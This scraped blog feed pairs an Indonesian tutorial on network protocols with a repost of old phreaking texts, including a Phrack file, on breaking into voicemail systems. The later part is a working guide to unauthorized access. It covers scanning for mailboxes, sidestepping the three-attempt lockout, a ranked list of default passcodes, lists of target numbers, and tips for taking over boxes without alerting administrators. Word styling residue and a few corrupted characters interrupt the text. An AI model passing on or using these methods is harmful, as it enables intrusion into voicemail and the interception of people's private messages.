</ol><div class="MsoNormal" style="margin-left: 36pt; text-align: justify;">Menjamin transportasi data antar mesin komputer tampa mempermasalahkan jenis jaringan. Data yang diatur meliputi metode akses sebuah jaringan topologi fisik, tipe kabel, dan kecepatan transfer data.</div><ol start="5" style="margin-top: 0cm;" type="a"><li class="MsoNormal" style="text-align: justify;">Lapisan sesi</li>
</ol><div class="MsoNormal" style="margin-left: 36pt; text-align: justify;">Menangani persiapan, pengelolaan, dan pemutusan antar aplikasi.</div><ol start="6" style="margin-top: 0cm;" type="a"><li class="MsoNormal" style="text-align: justify;">Lapisan presentasi</li>
</ol><div class="MsoNormal" style="margin-left: 36pt; text-align: justify;">Menangani pengubahan representasi data</div><ol start="7" style="margin-top: 0cm;" type="a"><li class="MsoNormal" style="text-align: justify;">Lapisan aplikasi</li>
</ol><div class="MsoNormal" style="margin-left: 36pt; text-align: justify;">Menangani pengaksesan pemakai.</div><div class="MsoNormal" style="text-align: justify;"> Prinsip komunikasi data memerlukan protokol sebagai saluran yang mengatur komunikasi diantara beberapa komputer dalam sebuah jaringan. Protokol yang terdapat dalam jaringan komputer adalah sebagai berikut:</div><div class="MsoNormal" style="margin-left: 18pt; text-align: justify; text-indent: -18pt;">A.<span style="font: 7pt "Times New Roman";"> </span>Ethernet</div><div class="MsoNormal" style="margin-left: 18pt; text-align: justify;">Ethernet menggunakan metode akses yang disebut CSMA/CD (Carrier Sense Multiple Access/Collision Detection) dalam mengkomunikasikan data. Ethernet bekerja dengan memperhatikan kabel dalam network atau jaringan sebelum dilakukan transformasi atau transmisi data. Bila dalam kabel jaringan tidak terdapat aktifitas maka komputer akan mentransmisikan data, tapi bila terdapat transmisi data lain, maka komputer akan menunggu dan mencoba kembali mentransmisi data jika kabel jaringan telah bersih dari transmisi data komputer lain. Penggunaan protokol ethernet digunakan pada topologi jaringan garis lurus, star, dan tree. Transmisi data dengan kecepatan 10Mbps dapat melalui kabel twisted pair, koaksial, atau serat optik.</div><div class="MsoNormal" style="margin-left: 18pt; text-align: justify; text-indent: -18pt;">B.<span style="font: 7pt "Times New Roman";"> </span>Localtalk</div><div class="MsoNormal" style="margin-left: 18pt; text-align: justify;">Localtalk merupakan protokol jaringan dengan menggunakan metode akses yang disebut CSMA/CA (Carrier Sense Multiple Access with Collision Avoidance). Untuk menghubungkan komputer ini, dapat melewati port serial dengan menggunakan adapter localtalk dan kabel twisted pair. Localtalk pertama kali dikembangkan oleh Apple Computer Inc. untuk komputer dengan mesin Macintosh yang memungkinkan koneksi dalam jaringan secara peer to peer tanpa membutuhkan tambahan aplikasi khusus. Kecepatan transmisinya hanya 230 Kbps yang merupakan kelemahan localtalk. Protokol localtalk dapat digunakan pada topologi jaringan garis lurus, star, atau tree dengan menggunakan kabel twisted pair.</div><div class="MsoNormal" style="margin-left: 18pt; text-align: justify; text-indent: -18pt;">C.<span style="font: 7pt "Times New Roman";"> </span>Token Ring</div><div class="MsoNormal" style="margin-left: 18pt; text-align: justify;">Metode akses protokol toke adalah melalui token dalam sebuah lingkaran seperti cincin. Protokol ini pertama kali dikembangkan tahun 1980 oleh perusahaan IBM. Sinyal token bergerak berputar dalam sebuah lingkaran (cincin) dalam sebuah jaringan dan bergerak dari satu komputer menuju ke komputer lainnya. Jika pada persinggahan di salah satu komputer terdapat data yang ingin ditransmisikan, Token akan mengirimkan data ke tembap yang diinginkan tersebut. Selanjutnya token bergerak untuk saling mengkoneksikan diantara masing-masing komputer. Dengan kecepatan transmisi data 4 Mbps atau 16 Mbps, protokol token ring dapat digunakan pada topologi jaringan dengan menggunakan kabel twisted pair atau kabel serat optik.</div><div class="MsoNormal" style="margin-left: 18pt; text-align: justify;"></div><div class="MsoNormal" style="margin-left: 18pt; text-align: justify; text-indent: -18pt;">D.<span style="font: 7pt "Times New Roman";"> </span>FDDI (Fiber Distributed Data Interface)</div><div class="MsoNormal" style="margin-left: 18pt; text-align: justify;">FDDI merupakan protokol jaringan dengan metode akses model Token. FDDI menghubungkan beberapa komputer sampai jarak yang jauh. FDDI menggunakan dua buah topologi cincin. Proses transmisinya menggunakan satu cincin, jika terdapat masalah dalam transmisi data, secara otomatis akan menggunakan cincin yang kedua. Kecepatan transmisi data sampai dengan 100 Mbps dan kabel yang digunakan adalah serat optik.</div><div class="MsoNormal" style="margin-left: 18pt; text-align: justify; text-indent: -18pt;">E.<span style="font: 7pt "Times New Roman";"> </span>ATM (Asynchcronous Transver Mode)</div><div class="MsoNormal" style="margin-left: 18pt; text-align: justify;">Protokol ini merupakan protokol jaringan yang mendukung transmisi data yang berbetuk gambar atau video. ATM umumnya digunakan untuk menghubungkan dua atau lebih jaringan Local Area Network (LAN). ATM bekerja dengan mentransmisikan data dengan menggunakan metode akses ke dalam satu paket. Topologi yang digunakan adalah topologi star dengan menggunakan kabel twisted pair atau serat optik. ATM sudah banyak digunakan oleh para ISP (Internet Setvice Provider) untuk meningkatkan kecepatan akses internet. Kecepatan transmisi datanya 155 s.d 2488 Mbps.</div><div class="MsoNormal" style="margin-left: 18pt; text-align: justify;">Prinsip komunikasi data pada masing-masing protokol yang digunakan sangat mempengaruhi dan menentukan dalam desain suatu jaringan, kabel yang digunakan dan kecepatan aksesnya.</div><table border="1" cellpadding="0" cellspacing="0" class="MsoTableGrid" style="border-collapse: collapse; border: medium none; width: 577px;"><tbody>
<tr> <td style="border: 1pt solid windowtext; padding: 0cm 5.4pt; width: 81.15pt;" valign="top" width="108"><div align="center" class="MsoNormal" style="text-align: center;"><b>PROTOKOL</b></div></td> <td style="border-color: windowtext windowtext windowtext -moz-use-text-color; border-style: solid solid solid none; border-width: 1pt 1pt 1pt medium; padding: 0cm 5.4pt; width: 134.95pt;" valign="top" width="180"><div align="center" class="MsoNormal" style="text-align: center;"><b>KABEL</b></div></td> <td style="border-color: windowtext windowtext windowtext -moz-use-text-color; border-style: solid solid solid none; border-width: 1pt 1pt 1pt medium; padding: 0cm 5.4pt; width: 120.5pt;" valign="top" width="161"><div align="center" class="MsoNormal" style="text-align: center;"><b>KECEPATAN</b></div></td> <td style="border-color: windowtext windowtext windowtext -moz-use-text-color; border-style: solid solid solid none; border-width: 1pt 1pt 1pt medium; padding: 0cm 5.4pt; width: 96.45pt;" valign="top" width="129"><div align="center" class="MsoNormal" style="text-align: center;"><b>TOPOLOGI</b></div></td> </tr>
<tr> <td style="border-color: -moz-use-text-color windowtext windowtext; border-style: none solid solid; border-width: medium 1pt 1pt; padding: 0cm 5.4pt; width: 81.15pt;" valign="top" width="108"><div class="MsoNormal" style="text-align: justify;">Ethernet </div></td> <td style="border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 134.95pt;" valign="top" width="180"><div class="MsoNormal" style="text-align: justify;">Twisted pair, koaksial</div></td> <td style="border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 120.5pt;" valign="top" width="161"><div class="MsoNormal" style="text-align: justify;">10 Mbps</div></td> <td style="border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 96.45pt;" valign="top" width="129"><div class="MsoNormal" style="text-align: justify;">Bus, star, tree</div></td> </tr>
<tr> <td style="border-color: -moz-use-text-color windowtext windowtext; border-style: none solid solid; border-width: medium 1pt 1pt; padding: 0cm 5.4pt; width: 81.15pt;" valign="top" width="108"><div class="MsoNormal" style="text-align: justify;">Fash ethernet</div></td> <td style="border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 134.95pt;" valign="top" width="180"><div class="MsoNormal" style="text-align: justify;">Twisted pair, serat optik</div></td> <td style="border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 120.5pt;" valign="top" width="161"><div class="MsoNormal" style="text-align: justify;">Serat optik 100 Mbps</div></td> <td style="border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 96.45pt;" valign="top" width="129"><div class="MsoNormal" style="text-align: justify;">Star</div></td> </tr>
<tr> <td style="border-color: -moz-use-text-color windowtext windowtext; border-style: none solid solid; border-width: medium 1pt 1pt; padding: 0cm 5.4pt; width: 81.15pt;" valign="top" width="108"><div class="MsoNormal" style="text-align: justify;">Local Talk</div></td> <td style="border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 134.95pt;" valign="top" width="180"><div class="MsoNormal" style="text-align: justify;">Twisted pair</div></td> <td style="border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 120.5pt;" valign="top" width="161"><div class="MsoNormal" style="text-align: justify;">0,23 Mbps</div></td> <td style="border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 96.45pt;" valign="top" width="129"><div class="MsoNormal" style="text-align: justify;">Bus, Star</div></td> </tr>
<tr> <td style="border-color: -moz-use-text-color windowtext windowtext; border-style: none solid solid; border-width: medium 1pt 1pt; padding: 0cm 5.4pt; width: 81.15pt;" valign="top" width="108"><div class="MsoNormal" style="text-align: justify;">Token Ring </div></td> <td style="border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 134.95pt;" valign="top" width="180"><div class="MsoNormal" style="text-align: justify;">Twisted pair</div></td> <td style="border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 120.5pt;" valign="top" width="161"><div class="MsoNormal" style="text-align: justify;">4Mbps – 16Mbps</div></td> <td style="border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 96.45pt;" valign="top" width="129"><div class="MsoNormal" style="text-align: justify;">Star-Wired Ring</div></td> </tr>
<tr> <td style="border-color: -moz-use-text-color windowtext windowtext; border-style: none solid solid; border-width: medium 1pt 1pt; padding: 0cm 5.4pt; width: 81.15pt;" valign="top" width="108"><div class="MsoNormal" style="text-align: justify;">FDDI</div></td> <td style="border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 134.95pt;" valign="top" width="180"><div class="MsoNormal" style="text-align: justify;">Serat Optik</div></td> <td style="border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 120.5pt;" valign="top" width="161"><div class="MsoNormal" style="text-align: justify;">100 Mbps</div></td> <td style="border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 96.45pt;" valign="top" width="129"><div class="MsoNormal" style="text-align: justify;">Dual Ring</div></td> </tr>
<tr> <td style="border-color: -moz-use-text-color windowtext windowtext; border-style: none solid solid; border-width: medium 1pt 1pt; padding: 0cm 5.4pt; width: 81.15pt;" valign="top" width="108"><div class="MsoNormal" style="text-align: justify;">ATM</div></td> <td style="border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 134.95pt;" valign="top" width="180"><div class="MsoNormal" style="text-align: justify;">Twisted pair, Serat Optik</div></td> <td style="border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 120.5pt;" valign="top" width="161"><div class="MsoNormal" style="text-align: justify;">155-2488 Mbps</div></td> <td style="border-color: -moz-use-text-color windowtext windowtext -moz-use-text-color; border-style: none solid solid none; border-width: medium 1pt 1pt medium; padding: 0cm 5.4pt; width: 96.45pt;" valign="top" width="129"><div class="MsoNormal" style="text-align: justify;">Tree</div></td></tr>
</tbody></table><h3><span style="font-size: small;"><b>Kesimpulan :</b></span></h3><h3><span style="font-size: small;"><span style="font-weight: normal;">Kesimpulannya adalah komunikasi data bertujuan :</span></span></h3>a. Memungkinkan pengiriman data dalam jumlah besar efesien, tanpa kesalahan dan ekonomis dari suatu tempat ketempat yang lain;<br />
b. Memungkinkan penggunaan sistem komputer dan peralatan pendukung dari jarak jauh (remote computer use);<br />
c. Memungkinkan penggunaan komputer secara terpusat maupun secara tersebar sehingga mendukung manajemen dalam hal kontrol, baik desentralisasi maupun sentralisasi;<br />
d. Mempermudah kemungkinan pengelolaan dan pengaturan data yang ada dalam berbagai macam sistem komputer;<br />
e. Mengurangi waktu untuk pengolahan data;<br />
f. Mendapatkan data langsung dari sumbernya (mempertinggi kehandalan);<br />
g. Mempercepat penyebarluasan informasi.<br />
<h3><span style="font-size: small;"><span style="font-weight: normal;"> source by :</span></span></h3>1. wikipedia.org<br />
2. http://mansthea.wordpress.com/2009/04/13/prinsip-komunikasi-data/<br />
3. eecchhoo.wordpress.com<br />
4. http://gurutijogja.blogspot.com/2007/09/prinsip-komunikasi-data.htmlAnonymoushttp://www.blogger.com/profile/02838058498179933086noreply@blogger.com0tag:blogger.com,1999:blog-4044212408950825345.post-70174055722516016842010-07-26T02:15:00.000+07:002010-07-26T02:30:31.891+07:00Hacking Voice Mail System<m:smallfrac m:val="off"> <m:dispdef> <m:lmargin m:val="0"> <m:rmargin m:val="0"> <m:defjc m:val="centerGroup"> <m:wrapindent m:val="1440"> <m:intlim m:val="subSup"> <m:narylim m:val="undOvr"> </m:narylim></m:intlim> </m:wrapindent><style>
<!--
/* Font Definitions */
@font-face
{font-family:"Cambria Math";
panose-1:0 0 0 0 0 0 0 0 0 0;
mso-font-charset:1;
mso-generic-font-family:roman;
mso-font-format:other;
mso-font-pitch:variable;
mso-font-signature:0 0 0 0 0 0;}
@font-face
{font-family:Calibri;
panose-1:2 15 5 2 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:swiss;
mso-font-pitch:variable;
mso-font-signature:-1610611985 1073750139 0 0 159 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{mso-style-unhide:no;
mso-style-qformat:yes;
mso-style-parent:"";
margin-top:0cm;
margin-right:0cm;
margin-bottom:10.0pt;
margin-left:0cm;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family:Calibri;
mso-fareast-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;}
.MsoChpDefault
{mso-style-type:export-only;
mso-default-props:yes;
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-fareast-font-family:Calibri;
mso-fareast-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:minor-bidi;}
.MsoPapDefault
{mso-style-type:export-only;
margin-bottom:10.0pt;
line-height:115%;}
@page Section1
{size:612.0pt 792.0pt;
margin:72.0pt 72.0pt 72.0pt 72.0pt;
mso-header-margin:35.4pt;
mso-footer-margin:35.4pt;
mso-paper-source:0;}
div.Section1
{page:Section1;}
-->
</style> </m:defjc></m:rmargin></m:lmargin></m:dispdef></m:smallfrac><br />
<div class="MsoNormal">Voice Mail is a relatively new concept and not much has been said about it.<br />
It is a very useful tool for the business person and the phreak. The way it<br />
works is that somebody wishing to get in touch with you calls a number,<br />
usually a 1-800, and punches in on his touch-pad your mailbox number and then<br />
he is able to leave a message for you. Business experts report that this<br />
almost totally eliminates telephone tag. When a person wishes to pick up his<br />
message all he needs to do is call the number enter a certain code and he can<br />
hear his messages, transfer them, and do other misc. mailbox utilities.<br />
Most VMSs are similar in the way they work. There are a few different ways<br />
the VMSs store the voice. One way is that the voice is recorded digitally and<br />
compressed and when heard it is reproduced back into the voice that recorded<br />
it. Another method that is slower and uses more space, but costs less, stores<br />
the voice on magnetic tape, the same type that is used to store data on a<br />
computer, and then runs the tape at a slow speed. Using this method the voice<br />
does not need to be reproduced in any way and will sound normal as long as the<br />
tape is running at a constant speed. On some of the newer VMSs the voice is<br />
digitally recorded and is transformed from the magnetic tape at about 2400<br />
bits per second.<br />
There are many different types and versions of voice mail systems. Some of<br />
the best and easiest to get on will be discussed<br />
Centagram<br />
---------<br />
These are direct dial (you don't have to enter a box number). To get on one<br />
of these, first have a number to any box on the system. All of the other<br />
boxes will be on the same prefix; just start scanning them until you find one<br />
that has a message saying that person you are calling is not available. This<br />
usually means that the box has not been assigned to anybody yet. Before the<br />
nice lady's voice tells you to leave the message, hit #. You will then be<br />
prompted for your password. The password will usually be the same as the last<br />
four digits of the box's number or a simple number like 1000, 2000, etc. Once<br />
you get on, they are very user friendly and will prompt you with a menu of<br />
options. If you can't find any empty boxes or want to do more, you can hack<br />
but the system administrators box, which will usually be 9999 on the same<br />
prefix as the other boxes, will allow you to hear anybody's messages and<br />
create and delete boxes.<br />
Sperry Link<br />
-----------<br />
These systems are very nice. They will usually be found on an 800 number.<br />
These are one of the hardest to get a box on because you must hack out a user<br />
ID (different from the person's box number) and a password. When it answers,<br />
if it says, "This is a Sperry Link voice station. Please enter your user ID,"<br />
you will have to start trying to find a valid user ID. On most Sperrys it<br />
will be a five digit number. If it answers and says, "This is an X answering<br />
service," you first have to hit *# to get the user number prompt. Once you<br />
get a valid user number will have oKVWV.."! password on most systems, it<br />
will be 4 digits. Once you get in, these are also very user friendly and have<br />
many different options available.<br />
RSVP<br />
----<br />
This is probably one of the worst VMSs but it is by far the easiest to get<br />
yourself a box. When it answers you can hit * for a directory of the boxes on<br />
it (it will only hold 23). If you hit # you will be given a menu of options<br />
and when you choose an option you will then be prompted for your ID number.<br />
The ID number on an RSVP system will just about always be the same as the<br />
mailbox number, which are always only 2 digits.<br />
A.S.P.E.N.<br />
----------<br />
The Aspen voice message systems made by Octel Telecommunications is in my<br />
opinion the BEST VMS made. To get a box on an Aspen, you need to find an<br />
empty box. To find an empty box, scan the box numbers and if one says, "You<br />
entered XXXX. Please leave a message at the tone," then this is an empty box.<br />
You next just press # and when prompted for your box number enter the number<br />
of the empty box and friendly voice of the nice lady will guide you through<br />
all of the steps of setting up your box. She first tells you what you can do<br />
with the box and then will prompt you with, "Please enter the temporary<br />
password assigned to you by your system manager." This password will usually<br />
be 4 digits long and the same as the box number like 1000, etc. Once you get<br />
on their are many things you can do. You can make a distribution list where<br />
if you want to leave a certain message to more than one person, you can enter<br />
the list number and all of the boxes on the list will get the message. You can<br />
also have the system call you and notify you that you have new messages. These<br />
systems also have what they call "Information center mailboxes" that are<br />
listen only and can also have a password on them so the person calling has to<br />
enter the password before he hears the greeting message. Aspen VMSs have a<br />
system managers mailbox that will just about give you total control of the<br />
whole system and let you listen to people's mail, create and delete boxes, and<br />
many other things.<br />
Thank you for reading this file and if you would like to get in touch with me<br />
VIA VOICE MAIL call 1-800-222-0311 and hit *2155.<br />
==========================================================================<br />
Mailbox Systems<br />
==========================================================================<br />
Mailbox systems are the link between information and the underworld. If<br />
you have ever called one, then you will know the advantages of having one,<br />
especially the ones that are open to whole underworld, rather than just a<br />
select few. There are two types of mailbox systems that are widely used.<br />
The first type we will talk about is the multiple mailbox systems, or<br />
commonly referred to as message systems. These systems have several<br />
mailboxes set up on one number. Usually, you can access other mailboxes<br />
from that number by pressing '*' or '#'. Sometimes you just enter the<br />
mailbox number and you are connected. These are the safest systems to use<br />
to protect information from US Sprint and other long distance companies.<br />
Since US Sprint and other companies call the destination numbers, it is<br />
safer to have 800 mailbox systems, and most of the time, the multiple<br />
mailbox systems are on 800 numbers. The passcode on these systems can<br />
vary in length and can be accessed by several different methods, so it is<br />
impossible to explain exactly how to hack these systems.<br />
The other type is the single mailbox system. These are usually set up<br />
in a reserved prefix in an area code. (Ex: 713-684-6xxx) These systems<br />
are usually controlled by the same type of hardware/software. To access<br />
the area where you enter the passcode, just hit '0' for a second or so.<br />
The passcodes are four (4) digits long. The only way to hack these is<br />
manually. The best thing you could do is to find one that does not have<br />
a recording from a person, but just the digitized voice. If you hack one<br />
that someone already owns, they will report it and it will not last as<br />
long.<br />
Here is a list mailboxes or prefixes to help you get started<br />
--------------------------------------------------------------------------<br />
Single Multiple Digits<br />
------------ ------------ --------<br />
213-281-8xxx 212-714-2770 3<br />
213-285-8xxx 216-586-5000 4<br />
213-515-2xxx 415-338-7000 Aspen Message System 3<br />
214-733-5xxx 714-474-2033 Western Digital<br />
214-855-6xxx 800-222-0651 Vincent and Elkins 4<br />
214-978-2xxx 800-233-8488 3<br />
215-949-2xxx 800-447-8477 Fairylink 7<br />
312-450-8xxx 800-521-5344 3<br />
313-768-1xxx 800-524-2133 RCA 4<br />
405-557-8xxx 800-527-0027 TTE TeleMessager 6<br />
602-230-4xxx 800-632-7777 Asynk 6<br />
619-492-8xxx 800-645-7778 SoftCell Computers 4<br />
713-684-6xxx 800-648-9675 Zoykon 4<br />
800-847-0003 Communications World 3<br />
==========================================================================<br />
==Phrack Inc.==<br />
Volume Three, Issue Thirty-four, File #6 of 11<br />
HACKING VOICE MAIL SYSTEMS<br />
DISCLAIMER<br />
I, Night Ranger, or anyone else associated with Phrack, am not responsible<br />
for anything the readers of this text may do. This file is for informational<br />
and educational purposes only and should not be used on any system or network<br />
without written permission of the authorized persons in charge.<br />
INTRODUCTION<br />
I decided to write this text file because I received numerous requests for<br />
vmbs from people. Vmbs are quite easy to hack, but if one doesn't know where<br />
to start it can be hard. Since there aren't any decent text files on this<br />
subject, I couldn't refer them to read anything, and decided to write one<br />
myself. To the best of my knowledge, this is the most complete text on<br />
hacking vmb systems. If you have any comments or suggestions, please let me<br />
know.<br />
Voice Mail Boxes (vmbs) have become a very popular way for hackers to get in<br />
touch with each other and share information. Probably the main reason for<br />
this is their simplicity and availability. Anyone can call a vmb regardless<br />
of their location or computer type. Vmbs are easily accessible because most<br />
are toll free numbers, unlike bulletin boards. Along with their advantages,<br />
they do have their disadvantages. Since they are easily accessible this<br />
means not only hackers and phreaks can get information from them, but feds<br />
and narcs as well. Often they do not last longer than a week when taken<br />
improperly. After reading this file and practicing the methods described,<br />
you should be able to hack voice mail systems with ease. With these thoughts<br />
in mind, let's get started.<br />
FINDING A VMB SYSTEM<br />
The first thing you need to do is find a VIRGIN (unhacked) vmb system. If<br />
you hack on a system that already has hackers on it, your chance of finding<br />
a box is considerably less and it increases the chance that the system<br />
administrator will find the hacked boxes. To find a virgin system, you need<br />
to SCAN some 800 numbers until you find a vmb. A good idea is to take the<br />
number of a voice mail system you know, and scan the same exchange but not<br />
close to the number you have. <br />
FINDING VALID BOXES ON THE SYSTEM<br />
If you get a high quality recording (not an answering machine) then it is<br />
probably a vmb system. Try entering the number 100, the recording should<br />
stop. If it does not, you may have to enter a special key (such as '*' '#'<br />
'8' or '9') to enter the voice mail system. After entering 100 it should<br />
either connect you to something or do nothing. If it does nothing, keep<br />
entering (0)'s until it does something. Count the number of digits you<br />
entered and this will tell you how many digits the boxes on the system are. <br />
You should note that many systems can have more than one box length depending<br />
on the first number you enter, Eg. Boxes starting with a six can be five<br />
digits while boxes starting with a seven can only be four. For this file we<br />
will assume you have found a four digit system, which is pretty common. It<br />
should do one of the following things...<br />
1) Give you an error message, Eg. 'Mailbox xxxx is invalid.'<br />
2) Ring the extension and then one of the following.<br />
1) Someone or no one answers.<br />
2) Connects you to a box.<br />
3) Connect you to mailbox xxxx.<br />
If you get #1 then try some more numbers. If you get #2 or #3 then you have<br />
found a valid vmb (or extension in the case of 2-1). Extensions usually have<br />
a vmb for when they are not at their extension. If you get an extension,<br />
move on. Where you find one box you will probably find more surrounding it. <br />
Sometimes a system will try to be sneaky and put one valid vmb per 10 numbers.<br />
Eg. Boxes would be at 105, 116, 121, ... with none in between. Some systems <br />
start boxes at either 10 after a round number or 100 after, depending on <br />
whether it is a three or four box system. For example, if you do not find<br />
any around 100, try 110 and if you do not find any around 1000 try 1100. The<br />
only way to be sure is to try EVERY possible box number. This takes time but<br />
can be worth it.<br />
Once you find a valid box (even if you do not know the passcode) there is a<br />
simple trick to use when scanning for boxes outside of a vmb so that it does<br />
not disconnect you after three invalid attempts. What you do is try two box<br />
numbers and then the third time enter a box number you know is valid. Then<br />
abort ( usually by pressing (*) or (#) ) and it will start over again. From<br />
there you can keep repeating this until you find a box you can hack on. <br />
FINDING THE LOGIN SEQUENCE<br />
Different vmb systems have different login sequences (the way the vmb owner<br />
gets into his box). The most common way is to hit the pound (#) key from the<br />
main menu. This pound method works on most systems, including Aspens (more<br />
on specific systems later). It should respond with something like 'Enter<br />
your mailbox.' and then 'Enter your passcode.' Some systems have the<br />
asterisk (*) key perform this function. Another login method is hitting a<br />
special key during the greeting (opening message) of the vmb. On a Cindy or<br />
Q Voice Mail system you hit the zero (0) key during the greet and since<br />
you've already entered your mailbox number it will respond with 'Enter your<br />
passcode.' If (0) doesn't do anything try (#) or (*). These previous two<br />
methods of login are the most common, but it is possible some systems will<br />
not respond to these commands. If this should happen, keep playing around<br />
with it and trying different keys. If for some reason you cannot find the<br />
login sequence, then save this system for later and move on.<br />
GETTING IN<br />
This is where the basic hacking skills come to use. When a system<br />
administrator creates a box for someone, they use what's called a default<br />
passcode. This same code is used for all the new boxes on the system, and<br />
often on other systems too. Once the legitimate owner logs into his new vmb,<br />
they are usually prompted to change the passcode, but not everyone realizes<br />
that someone will be trying to get into their mailbox and quite a few people<br />
leave their box with the default passcode or no passcode at all. You should<br />
try ALL the defaults I have listed first. <br />
DEFAULTS BOX NUMBER TRY <br />
box number (bn) 3234 3234 Most Popular<br />
bn backwards 2351 1532 Popular<br />
bn+'0' 323 3230 Popular With Aspens <br />
Some additional defaults in order of most to least common are: <br />
4d 5d 6d <br />
0000 00000 000000 *MOST POPULAR*<br />
9999 99999 999999 *POPULAR*<br />
1111 11111 111111 *POPULAR*<br />
1234 12345 123456 *VERY POPULAR WITH OWNERS*<br />
4321 54321 654321<br />
6789 56789 456789<br />
9876 98765 987654<br />
2222 22222 222222 <br />
3333 33333 333333<br />
4444 44444 444444<br />
5555 55555 555555<br />
6666 66666 666666<br />
7777 77777 777777 <br />
8888 88888 888888<br />
1991<br />
It is important to try ALL of these before giving up on a system. If none of<br />
these defaults work, try anything you think may be their passcode. Also<br />
remember that just because the system can have a four digit passcode the vmb<br />
owner does not have to have use all four digits. If you still cannot get<br />
into the box, either the box owner has a good passcode or the system uses a<br />
different default. In either case, move on to another box. If you seem to<br />
be having no luck, then come back to this system later. There are so many<br />
vmb systems you should not spend too much time on one hard system.<br />
If there's one thing I hate, it's a text file that says 'Hack into the<br />
system. Once you get in...' but unlike computer systems, vmb systems really<br />
are easy to get into. If you didn't get in, don't give up! Try another<br />
system and soon you will be in. I would say that 90% of all voice mail<br />
systems have a default listed above. All you have to do is find a box with<br />
one of the defaults.<br />
ONCE YOU'RE IN<br />
The first thing you should do is listen to the messages in the box, if there<br />
are any. Take note of the dates the messages were left. If they are more<br />
than four weeks old, then it is pretty safe to assume the owner is not using<br />
his box. If there are any recent messages on it, you can assume he is<br />
currently using his box. NEVER take a box in use. It will be deleted soon,<br />
and will alert the system administrator that people are hacking the system. <br />
This is the main reason vmb systems either go down, or tighten security. If<br />
you take a box that is not being used, it's probable no one will notice for<br />
quite a while.<br />
SCANNING BOXES FROM THE INSIDE<br />
>From the main menu, see if there is an option to either send a message to<br />
another user or check receipt of a message. If there is you can search for<br />
VIRGIN (unused) boxes) without being disconnected like you would from<br />
outside of a box. Virgin boxes have a 'generic' greeting and name. Eg.<br />
'Mailbox xxx' or 'Please leave your message for mailbox xxx...' Write down<br />
any boxes you find with a generic greeting or name, because they will<br />
probably have the default passcode. Another sign of a virgin box is a name<br />
or greeting like 'This mailbox is for ...' or a women's voice saying a man's<br />
name and vice versa, which is the system administrator's voice. If the box<br />
does not have this feature, simply use the previous method of scanning boxes<br />
from the outside. For an example of interior scanning, when inside an Aspen<br />
box, chose (3) from the main menu to check for receipt. It will respond with<br />
'Enter box number.' It is a good idea to start at a location you know there<br />
are boxes present and scan consecutively, noting any boxes with a 'generic'<br />
greeting. If you enter an invalid box it will alert you and allow you to<br />
enter another. You can enter invalid box numbers forever, instead of the<br />
usual three incorrect attempts from outside a box.<br />
TAKING A BOX<br />
Now you need to find a box you can take over. NEVER take a box in use; it<br />
simply won't last. Deserted boxes (with messages from months ago) are the<br />
best and last the longest. Take these first. New boxes have a chance of<br />
lasting, but if the person for whom the box was created tries to login,<br />
you'll probably lose it. If you find a box with the system administrator's<br />
voice saying either the greeting or name (quite common), keeping it that way<br />
will prolong the box life, especially the name.<br />
This is the most important step in taking over a box! Once you pick a box take over, watch it for at least three days BEFORE changing anything! Once<br />
you think it's not in use, then change only the passcode, nothing else! <br />
Then login frequently for two to three days to monitor the box and make sure<br />
<br />
<br />
no one is leaving messages in it. Once you are pretty sure it is deserted,<br />
change your greeting to something like 'Sorry I'm not in right now, please<br />
leave your name and number and I'll get back to you.' DO NOT say 'This is<br />
Night Ranger dudes...' because if someone hears that it's good as gone. Keep<br />
